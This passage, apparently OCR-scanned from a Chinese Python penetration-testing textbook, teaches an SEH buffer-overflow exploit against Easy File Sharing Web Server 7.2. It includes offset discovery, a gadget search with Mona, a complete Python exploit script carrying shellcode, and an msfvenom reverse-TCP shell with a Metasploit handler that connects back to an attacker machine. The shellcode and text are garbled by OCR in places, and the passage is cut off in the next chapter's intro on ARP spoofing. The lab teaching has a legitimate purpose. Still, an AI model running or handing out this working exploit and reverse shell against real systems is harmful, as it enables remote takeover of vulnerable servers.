Mr2Mr 3Mr4Mr5Mr 6Mr 7Mr8Mr 9Ms0Ms1Ms2Ms 3Ms4Ms5Ms 6Ms 7Ms8Ms 9Mt 0Mt 1Mt2Mt 3Mt 4Mt SMt 6Mt 7Mt 8 
Mt 9Mu0MulMu2Mu3Mu4Mu5Mu6Mu 7Mu8Mu9Mv0Mv1Mv2M " 

packet= ( 

"POST /forum.ghp HTTP/1.1" 

"Host: 192.168.169.133" 

"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/ 
45.0" 

"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 

"Accept-Language: en-US,en;q=0.5" 

"Referer: http://192.168.169.133/login.htm" 

"Cookie: SESSIONID=29055; UserID=" + payload + "; PassWD=123; frmUserName=; frmUserPass=; 
rememberPass=202%2C197%2C208%2C215%2C201;\r\n" 

"Connection: close" 
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"Cache-Control: max-age=0" 

"Content-Type: application/x-www-form-urlencoded" 

) 

s = socket.socket (socket.AF_INET, socket.SOCK STREAM) 
s.connect ( (host, port)) 

s.send (packet) 

s.close() 


然后 保存 这 个 数据 包 为 SEHattack py， 执 行 之 后 ， 切 换 到 目标 主机 ， 可 以 看 到 目标 程序 
HRT, WE 7-16 所 示 。 


L=: Ë Easy Fle Sharing Web Server Lz] 四 
° Easy File Sharing Web Server 已 停止 工作 
Windown TUINEN SNE. 


> 联机 检查 解决 方案 并 关闭 流程 序 
> 关闭 程序 


D sammens 


图 7-16 目标 程序 崩溃 
另外 ， 也 可 以 考虑 使 用 Burp Suite 来 发 送 这 个 数据 包 ， 这 个 方法 更 简单 快捷 ， 如 图 7-17 
所 示 。 


Burp Intruder Repeater Window Help 


0] Request to http://192.168.169.133:80 


EE CD a (es 


天 
POST /forum. ghp HTTP/1.1 


Host: 192. 168. 169. 133 
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100| 
Accept: text/html, application/xhtml+xml, application/xml; ¢0. 9, 
Accept-Language: en-US, en; 0.5 

Referer: http: //192. 168. 169. 133/login. htm 

Cookie: SESSIONID=29055; UserID=123; PassWD=123; frmUserName=; 
Connection: close 

Content-Type: application/x-www-form-urlencoded 

Content -Length: 60 


frmLoginrtru rmUserPass=1236LoginFLogir&21 


图 7-17 用 来 保存 用 户 名 的 字段 


150 2> Python 渗透 测试 编程 技术 : 方法 与 实践 


将 frmUserName= 后 面 的 123 替换 为 使 用 pattern_create 产生 的 10 000 个 字符 (复制 粘贴 
即 可 )。 修 改 之 后 的 数据 包 如 图 7-18 所 示 。 


Burp Suite Free Edition v1.7.17| 


Burp intruder Repeater Window Hep 
Spider | Scanner | intruder | Repeater | Sequencer | Decoder | comparer | Extender | Pr 


Target 
ei HTTP history | webSockets history | options 


国 Resvest to ttpins2 se 16915280 


Cema J oro) D (Ooae J 


Host: 192. 168. 169.133 
User-Agent: Mozilla/5 0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45. 0 
accept: text/htal,application/zhtal+xml, application/xsl; q0. 9, */™; q0.8 


复制 粘贴 完成 之 后 ， 单 击 如 图 7-19 所 示 的 Forward 按钮 就 可 以 将 这 个 数据 包 发 送出 去 。 


Burp Intruder Repeater Window Help. 


EZ ap Easy Fie sharing Web server 
Ea 一 一 
Easy File Sharing Web Server 已 停止 工作 

Wadon 机 百 二 本 二 方 要 


> 联机 检 可 解决 方案 并 关闭 该 程序 


ine] 


online] J ESL Server b or 


图 7-20 ”目标 程序 已 经 崩溃 
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这 里 目标 程序 Easy File Sharing Web Server 7.2 已 经 停止 了 工作 , 说 明 目 标 程序 可 能 存 
在 溢出 漏洞 。 接 下 来 切换 到 目标 程序 所 在 的 计算 机 ， 并 在 这 台 计 算 机 上 对 其 目标 程序 进行 调 
试 。 首 先 重新 启动 Easy File Sharing Web Server 7.2， 然 后 启动 Immunity Debugger， 如 图 7-21 
所 示 。 


[File] View Debug Plugins Immtib Options Window Help Jobs 


Open F3 
Gun 

Detach 

Exit Alt+X 


1 CAEFS Software\Easy File Sharing Web Server\fsws.exe Ctrl+F2 
2 CAUsers\Administrator\Desktop\FTPServer.exe 
3 CANUsers Administrator ADesktopitestl.exe 


图 7-21 将 Immunity Debugger 附加 到 进程 上 


并 在 进程 中 找到 Easy File Sharing Web Server 7.2， 然 后 单 击 Attach 按钮 ， 如 图 7-22 所 示 


图 7-22 可 以 附加 的 进程 列表 
在 完成 附加 操作 之 后 ， 就 可 以 在 调试 器 Immunity Debugger 中 观察 目标 程序 的 行为 。 现 
在 按照 前 面 给 出 的 方法 ， 向 目标 程序 发 送 一 个 长 达 10 000 字符 的 用 户 名 ， 然 后 在 调试 器 中 单 
击 “ 运 行 ” 按 钮 ， 就 是 图 7-23 中 那个 向 右 的 小 箭头 。 


File View — Plugins immLib Te 
Eel AN 
图 7-23 Hik “ZIT” FH 
这 时 就 是 最 为 关键 的 步 又， 可 以 单 击 View — SEH chain 命令 ， 如 图 7-24 所 示 。 
单 击 SEH chain 选项 就 可 以 看 到 被 我 们 提供 的 数据 所 修改 的 catch 块 和 下 一 条 SEH 记录 
的 地 址 ， 如 图 7-25 所 示 。 
这 里 面 的 46336646 就 是 到 下 一 条 SEH 记录 地 址 的 偏 移 量 ， 这 里 还 需要 使 用 Metasploit 
下 的 另 一 个 工具 pattern_offset， 如 图 7-26 所 示 。 
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[VSS] Debug Plugins Immuib Options 


log AL 
Executable modules Alt+E 
Memory ArM 
Heap 
Threads 
Windows 
Handles 
CPU Ah+C 
Patches ED 
a iek PY SEH chain of thread 0... = x 
Breakpoints At+B 
Hardware Breakpoints 
Watches 
References 
Run trace 
Source 
Source files 
File 
Text file 
图 7-24 选择 SEH chain 图 7-25 下 一 条 SEH 记录 的 地 址 


it# ./pattern offset.rb -q 46336646 -1 10000 


[*] Exact match at offset 4059 
图 7-26 下 一 条 SEH 记录 地 址 的 偏 移 量 


也 就 是 下 一 条 SEH 记录 地 址 的 偏 移 量 为 4059 
由 图 7-27 可 以 看 出 catch 块 的 偏 移 量 为 4063 


Loit# ./pattern_offset.rb -q 66463466 -l 10000 


[*] Exact match at offset 4063 


图 7-27 catch 块 的 偏 移 量 为 4063 


7.2.2 查找 POP/POP/RET 地 址 

正如 之 前 所 讨论 过 的 ， 需 要 POP/POP/RET 指令 的 地 址 来 载 和 人 下 一 条 SEH 记录 的 地 址 ， 
并 跳 转 到 攻击 载荷 。 这 需要 从 一 个 外 部 的 DLL 文件 载 人 一 个 地 址 ， 不 过 现在 大 多 数 最 先进 
的 操作 系统 都 使 用 SafeSEH 保护 机 制 来 编译 DLL， 因 此 需要 一 个 没有 被 SafeSEH 保护 的 
DLL 模块 的 POP/POP/RET 指令 地 址 。 这 里 需要 使 用 到 Mona py 脚本 。 

Mona. py 脚本 是 一 个 由 Python 编写 的 用 于 Immunity Debugger 的 插件 ， 它 提供 了 大 量 用 

于 渗透 的 功能 。 这 个 脚本 可 以 从 https://github.com/corelan/mona/blob/master/mona.py 下 载 。 

插件 的 安装 也 很 简单 ， 只 需要 将 这 个 脚本 放置 在 \Program Files\Immunity Incummunity 调试 器 
\PyCommands 目录 中 即 可 。 现 在 运行 “!mona module ”命令 启动 Mona (Immunity Debugger 
最 下 面 有 个 长 条 的 文本 框 ， 在 这 里 输入 命令 )， 如 图 7-28 所 示 。 
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!mona modul: 
Paused 


图 7-28 运行 “!mona module ”命令 启动 Mona 
要 查找 POP/POP/RET 指令 ,需要 使 用 命令 “! mona rop”。 这 条 命令 执行 的 结果 是 生成 


如 下 的 一 个 文件 C:\Program Files\ImmunityInc\Immunity Debugger\rop.txt， 这 个 文件 的 格式 如 
图 7-29 所 示 。 


Output generated by nona.py v2.0, rev 427 - Immunity Debusser 
Corelan Team — https: f/m corel on. be 


, velease 6. 1. 7601 
ne debuagsd ; feys (pid 1400) 


0210000000 | 0x10050090 | 0300050009 False 
xy5dc0000 | Ox75F16000 | Ox00136000 | True | True | True | Troe | Tru 
0174040000 | 0174050000 | 0x00010000 | True | True | True | Tre | Te 
0x?5c00000 | 0x75dl sn00 | 0x0011d000 | True | True | True | True | Trus 
0275320000 | 0x75364000 | 0x00044000 | True | True | True | Troe | Trus 
0x00300000 | 0x00345000 | 0x00045000 | True | True | False | False | False 
zyyYf0000 | 0xTy8cd000 | 0z000d4000 | True | True | True | True | True 


图 7-29 f#JH UltraISO 打开 Kali Linux 2 的 映像 文件 


注意 ， 虽 然 找到 了 很 多 DLL 文件 , 但 是 并 非 所 有 的 DLL 文件 都 可 以 使 用 ， 只 有 其 中 不 
受 SafeSEH 机 制 保护 的 才 可 以 使 用 。 另 外 ， 要 在 这 些 文件 中 查找 POP/POP/RET 指令 的 相关 
地 址 。 

从 图 7-29 中 可 以 看 出 来 ， 第 一 个 ImageLoad.dll 就 是 一 个 没有 使 用 SafeSEH (图 7-29 中 
的 SafeSEH 列 值 为 False) 的 DLL 文件 。 现 在 需要 做 的 就 是 在 这 个 文件 中 找到 一 条 POP/POP/ 
RET 指令 以 及 它 的 地 址 。Immunity Debugger 中 的 Mona.py 脚本 已 经 方便 地 找 出 这 些 POP/ 
POP/RET 指令 了 ， 如 图 7-30 所 示 。 


Ox00490000 : # POP ESI # MOV ECX, DWORD PTR SS: [ESP+84] # MOV DWORD PTR FS:[0],ECX # ADD ESP, 90 # RETN +*+ [fsws, exe] ++ 
0x00490001 : # NOV ECX, DWORD PTR SS:[ESP+84] # NOV DWORD PTR FS: [0], ECX # ADD ESP, 90 # RETN ++ [fsws.exe] * | star 
0x0046000b : # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP, 3C60 # RETN 0x08 +*+ [fsws.exe] ** | startnull, unicode 
0x0046000c : # POP ESI # POP EBP # POP EBX # ADD ESP, 3C60 # RETN 0x08  ** [fsws.exe] 林 | startnull, unicode, ascii t: 
Ox0046000d : # POP EBP # POP EBX # ADD ESP, 3C60 # RETN Ox08 ++ [fsws.exe] ** | startnull,unicode,ascii [PAGE_EXECI 
0x0046000e : # POP EBX # ADD ESP, 3C60 # RETN Ox08 ++ [fsws.eze] ** | startnull, unicode, ascii (PAGE_EXECUTE_READ) 
0x0046000f : # ADD ESP, 3C60 # RETN 0x08 ++ [fsws.exe] ** | startnull, unicode, ascii (PAGE_EXECUTE_READ) 

0x10020028 : # ADD ESP, 4 # XOR EAX, EAX # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,14 # RETN +*+ [TnageLoad. dl] 4 
0x1002002b : # XOR EAX EAX # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,14 # RETN ° ** [ImageLoad. dll] #* | null 
Ox1002002d : # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,14 # RETN “** [I a i ++ | null (PAGE_EXECUTE | 
0x1002002e : # POP ESI # POP EBP # POP EBX # ADD ESP,14 # RETN  ** [ImageLoad. rna null (PAGE_EXECUTE_READ) 
Ox1002002f : # POP EBP # POP EBX # ADD ESP,14 # RETN +*+ [ImageLoad. dl1. | null Plor EACLE READ] 

Ox10020030 : # POP EBX # ADD ESP,14 # RETN ++ [ImageLoad dll] +*+ | ruli {PAGE_EXECUTE_READ} 

0x10020031 : # ADD ESP,14 # RETN ++ [ImageLoad dll] #+ | null (PAGE_EXECUTE_READ)| 

Ox0054003e : # ADD CL,CL # RETN Oxl4 。 # [fsws.exe] ** | startnull, unicode, asciiprint, ascii (PAGE EXPCUTE READ) 
Ox0042004 # XCHG EAX, ESP # RETN — ** [fsws.exe] ** | startnull, unicode, asciiprint, ascii {PAGE EXECUTE READ} 


图 7-30 找到 的 POP/POP/RET 指令 


从 图 7-30 中 选择 0x10017743 作为 要 使 用 的 POP/POP/RET 的 地 址 ， 这 条 记录 完整 的 内 
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0x10017743 : # POP EBP # POP EBX # RETN ** [ImageLoad.dll] ** | ascii (PAGE _ 
EXECUTE READ) 


使 用 0x10019798 作为 POP/POP/RET 的 地 址 。 现 在 已 经 有 了 两 个 用 来 编写 渗透 模块 的 重 
要 组 件 , 一 个 是 偏 移 量 ， 另 一 个 是 用 来 载 入 catch 块 的 地 址 ， 也 就 是 POP/POP/RET 指令 地 址 。 

最 主要 的 两 个 部 分 已 经 完成 了 ， 剩 下 的 工作 还 需要 完成 有 滑行 需要 的 空 指 令 ， 坏 字符 的 
去 除 和 段 跳 转 指令 。 

其 中 ， 空 指令 滑行 是 指 在 POP/POP/RET 的 地 址 和 Shellcode 之 间 添 加 一 些 NOPs ( 空 指 
令 一 )， 这 样 做 的 目的 是 保证 Shellcode 顺利 执行 。 添 加 的 NOPs 的 数量 一 般 可 以 尝试 进行 ， 
例如 10、20、30、40、50 等 。 

坏 字符 去 除 的 原因 和 方法 在 第 6 章 中 已 经 介绍 过 。 

现在 就 差 一 条 短 跳 转 指令 一 一 用 来 载 信 下 一 条 SEH 记录 的 地 址 ， 并 帮助 程序 跳 转 到 
Shellcode。 短 跳 转 指令 的 编码 为 “\xebx06”"， 为 了 补 齐 ， 需 要 添加 两 个 “\x90" (也 就 是 NOPs)。 
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在 开始 渗透 模块 的 编写 之 前 ， 先 讨论 一 下 网 络 中 传输 数据 的 格式 。 

如 果 读 者 在 学 习 Python 之 前 有 过 其 他 语言 的 学 习 经 历 ， 一 定 会 发 现 每 种 语言 中 定义 的 
数据 类 型 都 不 相同 ， 相 比 其 他 语言 复杂 的 类 型 ，Python 要 简单 得 多 。 

但 是 细 想 一 下 ， 这 些 不 同 语言 编写 的 程序 在 互相 通信 的 时 候 ， 会 不 会 出 现 问题 呢 ? 要 知 
道 世 界 上 现 有 的 程序 已 经 成 千 上 万 了 ,那么 这 些 程序 是 如 何 处 理 通信 数据 的 呢 ? 其 实 方法 也 
很 简单 ， 就 是 规定 一 个 统一 的 格式 ， 不 管 什 么 语言 在 网 络 上 传输 数据 的 时 候 ， 都 将 其 转换 为 
统一 的 格式 即 可 。 

这 里 采用 最 基本 的 字 节 流 即 可 ， 这 种 方式 主要 用 在 处 理 二 进 制 数据 ， 它 是 按 字 节 来 处 理 
的 。 但 是 字 节 流 中 又 分 成 大 端 模式 和 小 端 模式 。 

(1 ) 大 端 模式 ， 是 指数 据 的 低位 保存 在 内 存 的 高 地 址 中 ， 而 数据 的 高 位 保存 在 内 存 的 低 
地 址 中 。 

(2 ) 小 端 模式 ， 是 指数 据 的 低位 保存 在 内 存 的 低地 址 中 ， 而 数据 的 高 位 保存 在 内 存 的 高 
地 址 中 。 

在 网 络 中 传输 的 数据 都 采用 了 大 端 模式 的 网 络 字 节 序 字 节 流 。 关 于 数据 格式 的 详细 内 
容 ， 读 者 可 以 参考 《深入 理解 计算 机 系统 》 和 《UNIX 网 络 编程 卷 I》。 

本 书 在 这 里 只 介绍 Python 语言 中 的 数据 转换 方法 ，Python 中 的 struct 模块 就 提供 了 这 样 
的 机 制 ， 该 模块 的 主要 作用 就 是 将 Python 的 数据 类 型 进行 转换 。struct 模块 提供 了 很 简单 的 
几 个 函数 ， 甚 中 最 常用 的 函数 是 pack， 这 个 方法 实现 了 对 数据 按 指定 格式 进行 打包 ， 和 这 个 
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函数 相对 应 的 是 unpack， 实 现 了 对 数据 按 指 定格 式 进行 解 包 。 

pack 函数 的 格式 为 : 

pack(fmt, vl, v2, ++) 

其 中 ，fimt 支持 的 格式 数量 相当 多 ， 这 里 仅 介绍 最 常用 的 一 种 “I”， 这 种 格式 表示 C 语 
言 中 的 “unsigned int”。 在 网 络 中 传输 数据 的 时 候 需 要 转换 为 这 个 格式 。 

另外 需要 考虑 的 一 点 是 大 端 和 小 端 ， 其 中 , 使 用 “<” 表 示 小 端 ,“>” 表 示 大 端 。 网 络 
中 传输 的 数据 一 般 使 用 的 就 是 小 端的 “unsigned int” 格 式 。 例 如 7.2 节 找 到 的 POP/POP/RET 
的 地 址 在 网 络 中 传输 ， 就 可 以 使 用 这 段 代 码 进行 转换 。 


import struct 
s=struct.pack("<I", 0x10017743) 


另外 需要 注意 的 是 ， 在 向 目标 发 送 攻击 代码 的 时 候 ， 这 些 攻击 代码 也 需要 使 用 小 端的 
“unsigned int ”格式 。 

接 下 来 开始 设计 这 个 程序 ， 首 先导 入 需要 的 库 文 件 ， 一 共 需 要 两 个 库 文件 ， 一 个 是 
socket， 男 一 个 是 struct。 

import socket, struct 

测试 用 Easy File Sharing Web Server 7.2 所 在 主机 的 IP 地 址 为 “192.168.169.133”, 目标 
端口 为 80。 


host 
port 


接 下 来 要 定义 的 是 发 往 目标 服务 器 的 代码 payload， 这 里 包括 以 下 几 个 部 分 。 

(1) 导致 目标 服务 溢出 的 字符 (4059 个 “A”)。 

payload = "A"*4059 

(2 ) 实现 跳 转 的 指令 (“\xeb\x06\x90\x90”) 。 

payload += "\xeb\x06\x90\x90" 

(3) POP/POP/RET 的 地 址 。 

payload += struct.pack("<I", 0x10017743) 

(4) 用 来 实现 空 指令 滑行 的 代码 ， 作 用 就 是 在 跳 转 地 址 和 Shellcode 之 间 设 置 一 个 滑行 
区 域 ， 这 个 区 域 使 用 空 指令 填充 ， 从 而 避免 Shellcode 中 的 代码 不 能 正常 执行 ， 在 此 处 添加 
30、40、50 个 空 指令 都 可 以 使 代码 滑行 到 Shellcode 部 分 (这 个 数值 采用 测试 得 到 )。 太 小 会 
崩溃 ， 太 大 会 死机 。 


payload += "\x90"*40 


"192.168.169.133" 
80 
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(5) 用 来 在 目标 主机 上 实现 特定 功能 的 代码 ,网 上 有 很 多 地 方 都 可 以 找到 这 种 代码 。 另 
外 ，Kali Linux 2 中 也 提供 了 这 种 工具 ， 后 面 会 详细 介绍 。 下 面 使 用 代码 的 作用 就 是 启动 
Windows 环境 下 的 计算 器 (calc) 程序 。 另 外 需要 注意 的 是 ， 第 6 章 中 介绍 了 坏 字符 的 确定 方 
法 , 在 Shellcode 中 要 避免 坏 字 符 ， 这 里 面 的 坏 字符 为 “\x0O\x3b”。 


shellcode = ( 
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xel\xc0\xd9" 
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\xlb\xe9\x09\x5a" 
"\xlc\x39\xbd" 

payload += shellcode 


(6) 下 面 要 构造 一 个 发 往 目标 主机 的 数据 包 ， 这 个 数据 包 格式 可 以 参考 7.2 节 中 的 内 容 。 


++ ++ ++ + 


packet = ( 

"POST /forum.ghp HTTP/1.1" 

"Host; 192.168.169.133%” 

"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" 

"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 

"Accept-Language: en-US,en;q=0.5" 

"Referer: http://192.168.169.133/login.htm" 

"Cookie: SESSIONID=29055; UserID=" + payload + "; PassWD=123; frmUserName=; 
frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; \r\n" 

"Connection: close" 

"Cache-Control: max-age=0" 

"Content-Type: application/x-www-form-urlencoded" 


) 
(7) 最 后 使 用 socket 将 这 个 数据 包 发 送出 去 。 


s = socket.socket (socket.AF_INET, socket.SOCK_ STREAM 
s.connect ( (host, port)) 

s.send(packet) 

s.close () 


完整 的 程序 如 下 所 示 。 


import socket, struct 

host ="192.168.169.133" 

port = 80 

shellcode = ( 
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 


+ + + + 
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"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + 

"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + 

"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\xlb\xe9\x09\x5a" + 

"\xle\x39\xbd" 

) 

print "[+]Connecting to" + host 

payload = "A"*4059 

payload += "\xeb\x06\x90\x90" 

payload += struct.pack("<I", 0x10017743) 

payload += "\x90"*40 

payload += shellcode 

packet = ( 

"POST /forum.ghp HTTP/1.1" 

“Hosti 192.168-169.133" 

"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" 

"Accept: text/html,application/xhtml+xml, application/xml; q=0.9,*/*;q=0.8" 

"Accept-Language: en-US,en;q=0.5" 

"Referer: http://192.168.169.133/login.htm" 

"Cookie: SESSIONID=29055; UserID=" + payload + "; PassWD=123; frmUserName=; 
frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201;\r\n" 

"Connection: close" 

"Cache-Control: max-age=0" 

"Content-Type: application/x-www-form-urlencoded" 

) 

print "[+]Sending the Calc...." 

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 

s.connect ( (host, port)) 

s.send(packet) 

s.close () 


执行 这 段 代码 之 后 ,在 目标 计算 机 上 查看 反应 ， 结 果 如 图 7-31 所 示 。 


Windows FTL 


> 联 机 检查 解决 方案 并 关闭 该 程序 
> 关闭 程序 


图 7-31 目标 程序 崩溃 并 弹出 一 个 计算 器 程序 
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7.4 使 用 Metasploit 与 渗透 模块 协同 工作 


IRIS 6 章 最 后 部 分 介绍 的 一 样 ， 例 如 ， 这 里 就 可 以 使 用 msfvenom 来 生成 Shellcode。 


root@kali: ~ # msfvenom -p windows/shell/reverse_tcp LHOST=192.168.169.132 
LPORT=8585 -b "\x00\x3b" -e x86/shikata_ga_nai -f python -v shellcode 


这 条 命令 执行 之 后 将 会 产生 一 个 可 以 执行 的 Shellcode， 执 行 过 程 如 图 7-32 所 示 。 


a nai 
No platform w se e € Msf 
ad 
No Arch 


Found 1 


图 7-32 使 用 msfvenom 来 生成 Shellcode 


完整 的 可 以 执行 的 Shellcode 如 下 所 示 


shellcode= "\xdb\xdd\xbb\x5e\x78\x34\xc0\xd9\x74\x24\xf4\x5e" 


shellcode += "\x29\xc9\xb1\x54\x31\x5e\x18\x03\x5e\x18\x83\xc6" 
shellcode += "\x5a\x9a\xcl\x3c\x8a\xd8\x2a\xbd\x4a\xbd\xa3\x58" 
shellcode += "\x7b\xfd\xd0\x29\x2b\xcd\x93\x7c\xc7\xa6\xf6\x94" 


shellcode 
shellcode 


+= "\x5c\xca\xde\x9b\xd5\x61\x39\x95\xe6\xda\x79\xb4" 
+= "\x64\x21\xae\x16\x55\xea\xa3\x57\x92\x17\x49\x05" 


shellcode += "\x4b\x53\xfc\xba\xf8\x29\x3d\x30\xb2\xbc\x45\xa5" 
shellcode "\x02\xbe\x64\x78\x19\x99\xa6\x7a\xce\x91\xee\x64" 
shellcode "\x13\x9f\xb9\x1f\xe7\x6b\x38\xf6\x36\x93\x97\x37" 


shellcode 
shellcode 


"\xf7\x66\xe9\x70\x3f\x99\x9c\x88\x3c\x24\xa7\x4e" 
+= "\x3f\xf2\x22\x55\xe7\x71\x94\xb1\x16\x55\x43\x31" 


shellcode += "\x14\x12\x07\x1d\x38\xa5\xc4\x15\x44\x2e\xeb\xf9" 
shellcode += "\xcd\x74\xc8\xdd\x96\x2f\x71\x47\x72\x81\x8e\x97" 
shellcode += "\xdd\x7e\x2b\xd3\xf3\x6b\x46\xbe\x9b\x58\x6b\x41" 


shellcode 
shellcode 
shellcode 
shellcode 
shellcode 
shellcode 
shellcode 


+= "\x5b\xf7\xfc\x32\x69\x58\x57\xdd\xc1\x11\x71\xla" 
+= "\x26\x08\xc5\xb4\xd9\xb3\x36\x9c\xl1d\xe7\x66\xb6" 
"\xb4\x88\xec\x46\x39\x5d\x98\x43\xad\x9e\xf5\x60" 
"\xad\x77\x04\x79\x8c\x0e\x81\x9f\x9e\x40\xc2\x0f" 
"\x5e\x31\xa2\xff\x36\x5b\x2d\xdf\x26\x64\xe7\x48" 
"\xcc\x8b\x5e\x20\x78\x35\xfb\xba\x19\xba\xd1\xc6" 
"\x19\x30\xd0\x37\xd7\xb1\x91\x2b\x0f\xa0\x59\xb4" 


shellcode "\xcf\x49\x5a\xde\xcb\xdb\x0d\x76\xd1\x3a\x79\xd9" 
shellcode "\x2a\x69\xf9\xle\xd4\xec\xc8\x55\xe2\x7a\x75\x02" 
shellcode "\x0a\x6b\x75\xd2\x5c\xe1\x75\xba\x38\x51\x26\xdf" 


shellcode 
shellcode 


shellcode + 


shellcode 
shellcode 


"\x47\x4c\x5a\x4c\xdd\x6f\x0b\x20\x76\x18\xb1\x1f" 
+= "\xb0\x87\x4a\x4a\xc3\xc0\xb5\x08\xel1\x68\xde\xf2" 
"\xa5\x88\xle\x99\x25\xd9\x76\x56\x0a\xd6\xb6\x97" 
"\x81\xbf\xde\x12\x47\x0d\x7e\x22\x42\xd3\xde\x23" 
+= "\x60\xc8\x37\xaa\x87\xef\x37\x4c\xb4\x39\x0e\x3a" 
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shellcode += "\xfd\xf9\x35\x35\xb4\x5c\xlf\xdc\xb6\xf3\x5f\xf5" 


使 用 上 面 的 代码 来 替换 7.3 节 中 最 后 面 程序 中 的 Shellcode， 并 以 “ SEHattack.py” 为 名 
保存 这 个 程序 。 

然后 启动 Metasploit 中 的 主 控 端 ， 方 法 就 是 在 命令 行 中 输入 “ msfconsole”。 在 启动 了 
Metasploit 之 后 ， 执 行 如 下 命令 (作用 和 上 面 设置 的 被 控 端 相同 )。 

msf > use exploit/multi/handler 

msf exploit (handler) > set lhost 192.168.169.132 

lhost => 192.168.169.132 

msf exploit (handler) > set lport 8585 

lport => 8585 

msf exploit (handler) > run 

现在 主 控 端 已 经 启动 起 来 ， 可 以 执行 SEHattack.py 来 完成 对 目标 程序 的 渗透 。 攻 击 程序 
执行 之 后 ， 可 以 看 到 主 控 端 打开 了 一 个 Session, WE 7-33 所 示 


TT 


8.169.133:49310 


图 7-33” 主 控 端 打开 一 个 Session 


而 这 时 目标 程序 依然 能 正常 运行 ， 如 图 7-34 所 示 


Server Help 


oreore Ej 


tart Stop Stop SSL | About 


30 
http://192. 168. 169.133 


: 443 Restart 


: https://192.168.169.133 


El Launch Web Server at windows startup 
[E] Startup minimized in systemtray 

[Z] Automaticaly activate server at startup 
[Z] Automatically activate ssl server at startup 
[V] Enable guest to login 

[F] Enable guest to register anew account un) 
[Z] Logh to virtual folder by default 

[Z] Alow users to upload fies to forums 

E Disable forums 

EZ] Allow fies to be overwritten 

€ E Save log to fie GJ 


oina unera [ More Options... | [ SMTP Setup... | [ Templates... | [ Semvice... 


[Web Server is online] / [SSL Server is online] 


图 7-34 目标 程序 仍 在 正常 运行 
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小 结 


本 章 中 介绍 了 如 何 使 用 Python 编写 高 级 的 渗透 程序 ， 这 种 方法 要 比 直接 溢出 具有 更 广 
泛 的 应 用 ， 几 乎 可 以 应 用 在 所 有 的 操作 系统 中 。 另 外 ， 读 者 也 可 以 访问 网 站 https://www. 
exploit-db.com/， 在 这 个 网 站 中 可 以 找到 这 个 世界 上 大 多 数 漏洞 的 渗透 模块 ， 而 且 这 些 模块 
可 以 直接 运行 。 在 最 后 使 用 了 网 络 安全 渗透 测试 工具 Metasploit， 这 是 一 款 极 为 强大 的 网 络 
安全 渗透 工具 ， 如 果 之 前 没有 Metasploit 的 使 用 经 验 ， 那么 可 以 阅读 《精通 Metasploit 渗透 
测试 》 一 书 ， 这 本 书 的 第 2 版 已 经 出 版 。 
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无 论 什么 样 的 漏洞 渗透 程序 ， 在 网 络 中 都 是 以 数据 包 的 形式 传输 的 ， 因 此 ， 如 果 能 够 对 
网 络 中 的 数据 包 进 行 分 析 ， 就 可 以 深入 地 掌握 渗透 的 原理 。 另 外 ， 很 多 网 络 攻击 的 方法 也 都 
是 利用 发 送 精 心 构造 的 数据 包 来 完成 的 ， 例 如 常见 的 ARP 欺骗 。 利 用 这 种 欺骗 方式 ， 黑 客 
就 可 以 截获 受害 者 计算 机 与 外 部 通信 的 全 部 数据 ， 例 如 受害 者 登录 使 用 的 用 户 名 与 密码 ， 发 
送 的 邮件 等 。 

Æ Kali Linux 2 的 启动 界面 中 就 清晰 地 展示 了 一 条 忠告 “The quieter you are the more you 
are able to hear”。 设 想 这 样 的 场景 ， 一 个 黑客 就 静 静 地 潜伏 在 你 的 身边 ， 他 手中 的 设备 将 每 
一 个 经 过 你 的 计算 机 的 网 络 数据 都 复制 了 一 份 。 互 联网 中 的 大 部 分 数据 都 没有 采用 加 密 的 方 
式 传输 ， 这 也 就 意味 着 ， 你 在 网 络 上 的 一 举 一 动 都 在 别人 的 监视 之 下 。 例如， 使 用 HTTP、 
FTP 或 者 Telnet 协议 所 传输 的 数据 都 是 明文 传输 的 ， 一旦 数据 包 被 监听 ， 那 么 里 面 的 信息 也 
直接 会 泄露 。 而 这 一 切 并 不 难以 做 到 ， 任 何 一 个 有 经 验 的 黑客 都 可 以 轻而易举 地 通过 抓 包 工 
具 来 捕获 这 些 信息 ， 从 而 突破 网 络 ， 窃 取 网 络 中 的 秘密 。 网 络 中 最 为 著名 的 一 种 欺骗 攻击 被 
称 为 “中 间 人 攻击 ”。 在 这 种 攻击 方式 中 ， 攻 击 者 会 同时 欺骗 设备 A 和 设备 B， 攻 击 者 会 设 
